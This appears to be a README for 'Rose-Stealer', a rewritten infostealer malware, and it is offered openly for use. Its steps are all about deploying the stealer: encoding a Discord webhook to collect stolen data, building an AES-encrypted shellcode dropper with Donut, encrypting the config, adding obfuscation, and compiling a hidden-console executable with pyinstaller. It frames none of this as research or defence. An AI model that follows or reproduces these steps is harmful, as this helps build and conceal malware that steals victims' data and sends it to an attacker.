🐍 Rose-Stealer

Rewritten version of the rose malware family.

Caution

I am not liable for anything that is happening with this software. If you don't trust it, read the source.

Important

This is a small rewritten version for the rose implant. I don't provide support for this. You should know what you're doing.

Encode your Discord Webhook: python utils\b85_encode.py DISCORD_WEBHOOK

[main]
# base 85 encoded and hexified discord webhook
discord_webhook=DISCORD_WEBHOOK <--- Put the encoded webhook here

File dropper if wanted:
- generate shellcode with Donut for an executable file to e.g. client\ shellc.dat
- AES encrypt the shellcode file:
  - python utils\aes_encrypt.py payload\shellc.dat payload\shellc.aes
  - Copy the output key into your config.ini file like this:
```
[shellcode_loader]
# file path storing AES encrypted and compressed shellcode
shellcode_file_name=shellc.aes
# hexified 32 byte (128-bit AES key)
shellcode_key=AES_KEY <--- Put the AES key here
```
Edit the config file and change the False statements accordingly to True for your needs.
Now encrypt the config file:
- python utils\aes_encrypt.py payload\config.ini payload\config.aes
- Put the output key you received into the malware source code on line 380:
```
key = "AES_KEY"  # hexified 32 byte key (128-bit) <--- Put the AES key here
```

(Additionally i would recommend to add obfuscation on the script now.)

You can now compile it into a binary:
- Dropper enabled: pyinstaller --noconsole --onefile --clean --add-data "payload\shellc.aes;." --add-data "payload\config.aes;." --hidden-import cryptography --hidden-import pywin32 --hidden-import pillow --hidden-import aiohttp payload\main.py
- Dropped disabled: pyinstaller --noconsole --onefile --clean --add-data "payload\config.aes;." --hidden-import cryptography --hidden-import pywin32 --hidden-import pillow --hidden-import aiohttp payload\main.py

Yay! Your executable is now inside of the dist folder.